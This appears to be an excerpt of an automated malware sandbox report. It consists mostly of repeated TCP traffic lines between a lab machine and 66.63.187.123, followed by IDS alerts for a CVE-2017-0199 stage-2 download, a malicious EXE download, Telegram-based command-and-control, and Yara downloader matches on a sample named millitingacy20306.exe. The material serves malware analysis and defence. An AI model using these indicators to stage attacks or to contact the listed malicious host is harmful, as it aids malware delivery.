                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2024413 - Severity 1 - ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL : 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49166
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49166
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
